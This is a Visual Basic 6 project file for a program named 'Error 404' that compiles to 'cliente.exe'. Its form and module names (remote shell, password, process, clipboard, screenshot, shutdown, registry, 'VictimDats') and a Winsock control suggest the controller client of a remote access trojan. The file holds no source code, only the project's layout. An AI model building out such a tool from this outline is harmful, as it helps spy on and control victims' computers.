Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\Windows\system32\stdole2.tlb#OLE Automation
Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCTL.OCX
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Object={6B7E6392-850A-101B-AFC0-4210102A8DA7}#1.3#0; comctl32.ocx
Module=modSend; Send.bas
Form=frmInitialize.frm
Form=frmChatConfig.frm
Form=frmChat.frm
Form=frmClipboard.frm
Form=frmInfo.frm
Form=frmMain.frm
Form=frmMSG.frm
Form=frmMSN.frm
Form=frmNETOptions.frm
Form=frmNotify.frm
Form=frmPass.frm
Form=frmPing.frm
Form=frmPorts.frm
Form=frmPrinter.frm
Form=frmProcess.frm
Form=frmScripts.frm
Form=frmShell.frm
Module=modSocketMaster; modSocketMaster.bas
Class=CSocketMaster; CSocketMaster.cls
Module=modNotify; modNotify.bas
Module=modAPIS; modAPIS.bas
Form=frmScreen.frm
Form=frmShutdown.frm
Form=frmScreenShot.frm
Module=modRegValues; modRegValues.bas
Form=frmVictimDats.frm
Startup="frmMain"
HelpFile=""
Title="Proyecto1"
ExeName32="cliente.exe"
Command32=""
Name="Error404"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="ASSoftware"
VersionLegalCopyright="ASSaulting"
VersionProductName="Error 404"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0
